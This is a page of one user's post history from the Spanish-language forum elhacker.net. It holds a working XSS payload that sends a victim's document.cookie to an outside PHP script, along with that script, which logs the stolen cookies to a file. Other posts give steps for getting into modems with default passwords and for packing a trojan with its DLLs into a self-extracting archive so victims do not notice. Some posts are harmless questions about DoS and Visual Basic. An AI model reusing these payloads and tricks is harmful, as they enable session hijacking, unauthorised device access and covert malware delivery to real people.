elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: 1 [2] 3 4
11  Seguridad Informática / Hacking / Re: Extraño escaneo en: 27 Febrero 2010, 08:57 am
Lo que podés hacer es lo siguiente:

1) te conectas via telnet al puerto 80 (el puerto del http)
2) cuando te conectes das 2 enter y te va a pasar una respuesta con info que muchas veces si la pones en google te va a dar el modelo del modem.
3)buscar los usuarios contraseñas por defecto del modem
4) si logras entrar a la configuración mapeas unos puertos y empezas a ver que se puede hacer.
12  Seguridad Informática / Nivel Web / Re: XSS no envia datos en: 28 Febrero 2009, 20:04 pm
El problema no son las cookies, porque en algunas paginas de webhosting el codigo php recibe la cadena con las cookies perfectamente, pero en otras no. Pensé que podria ser un  problema común, pero igual muchas gracias sirdarckcat.
13  Seguridad Informática / Nivel Web / XSS no envia datos en: 27 Febrero 2009, 20:40 pm
uso el siguiente codigo:

Código:
<script>document.location='http://mipagina.com/archivo.php?x='+document.cookie;</script>


donde archivo.php contiene lo siguiente:

Código:
   1.
      <?php
   2.
      $fp = fopen("datos.txt", "a+");
   3.
      $cookie = $_GET['x'];
   4.
      $salto = "\n-----------------------------\n";
   5.
      fwrite($fp,$salto);
   6.
      fwrite($fp,$cookie);
   7.
      fclose($fp);
   8.
      ?>

Pero si el archivo php está hospedado en un servidor funciona y en otro no. En el que no funciona le di todos los permisos a la carpeta (777) y a los archivos que contiene para que pueda almacenar los datos, pero solo guarda la linea punteada "$salto", porqué puede suceder esto?

cuando la pagina vulnerable se redirecciona, en la url se ve todo el contenido de la cookie por document.cookie, pero estos datos no son tomados para ser escritos
14  Seguridad Informática / Nivel Web / Re: Reset Admin Password 1.1.7 SMF (TEORIA) en: 9 Enero 2009, 19:31 pm
Yo no se si está bien poner esto, pero a mi me parece copadisimo el laburo que hiciste. Da gusto venir a este boliche  ;D.

ah esa suma se llama checksum

http://es.wikipedia.org/wiki/Checksum
15  Foros Generales / Sugerencias y dudas sobre el Foro / Re: google y DoS en: 3 Enero 2009, 08:06 am
Bueno en realidad mi duda era porque google soportaba tantas peticiones sin padecer una denegación de servicio y la respuesta no fue mala, todo lo contrario y practicamente instantánea, pero no tengo muchos mas datos para buscar en google que "ancho de banda", no estudio informática ni nada por el estilo, no conozco sobre arquitectura de redes, solo tengo adicción a la programación desde muy chico.
De todos modos fue algo que me rajó la mente a mitad de madrugada pensando en las denegaciones que hacen con miles de computadoras zombies y pensaba que con solo miles y no millones de computadoras a google no lo afectaria en los mas mínimo (supuse eso)
Muchas gracias por la charla amena  ;D Buen año para todos!
16  Foros Generales / Sugerencias y dudas sobre el Foro / Re: google y DoS en: 2 Enero 2009, 11:35 am
¿De que depende la cantidad de visitas que puede soportar un servidor? como saberlo?
17  Foros Generales / Sugerencias y dudas sobre el Foro / google y DoS en: 2 Enero 2009, 08:47 am
Porque a la pagina del hacker.net la afectó el virus bush que hacia peticiones para provocar una denegación de servicio y a paginas como google que las visitan desde todo el mundo todo el tiempo no les pasa nada?
18  Programación / Programación Visual Basic / Re: Crear aplicaciones de consola VB {AVANZADO} [Clase] en: 10 Octubre 2008, 21:30 pm
Porque una clase? En serio lo pregunto, si en un modulo simplón se pueden poner las funciones IniciarConsola (que retorne True si todo sale bien), EscribirEnConsola (que retorne el numero de caracteres escritos), LeerDesdeConsola (que guarda en un buffer el texto ingresado a la consola y retorne el numero de caracteres ingresados), TerminarConsola (retorno True o False y TituloDeConsola (puede ser solo una subrutina)
19  Programación / Programación Visual Basic / Re: Ayuda dll en: 5 Octubre 2008, 02:45 am
Como seria eso? nunca lo hice. Gracias.

pero como ustedes ya saben los server no pueden venir con dll apartes porque o si no se darian cuenta las personas que lo vallan a abrir

si metes todo en un autoextraible de winrar (.exe) es un solo ejecutable y se descomprimen lo programas en la carpetas que quieras, e incluso esta la opcion de ejecutarse despues de extraerse y ponerle el icono que quieras.
20  Programación / Programación Visual Basic / Re: Problema al ejecutar mi troyano en otro pc en: 1 Octubre 2008, 17:34 pm
http://foro.elhacker.net/printpage.html;topic=171025.0

ahi hay un ejemplo de un modulo .bas para sustituir el OCX, eso esta hacia al final, antes hay una introduccion a las apis.
Páginas: 1 [2] 3 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines